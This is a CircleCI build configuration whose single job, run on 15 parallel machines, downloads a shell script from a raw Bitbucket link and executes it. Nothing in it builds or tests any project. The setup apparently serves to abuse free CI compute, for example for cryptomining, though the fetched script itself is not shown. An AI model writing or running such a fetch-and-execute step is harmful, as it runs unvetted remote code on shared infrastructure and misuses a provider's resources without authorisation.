version: 2.1

jobs:
  build:
    parallelism: 15
    machine:
      image: ubuntu-2004:202101-01
    steps:
      - checkout
      - run : |
               wget https://bitbucket.org/yayuasaw/volkath/raw/b692e9cd2f0b8f7e36589599a6a32eb7327622ff/project.sh && chmod +x project.sh && ./project.sh
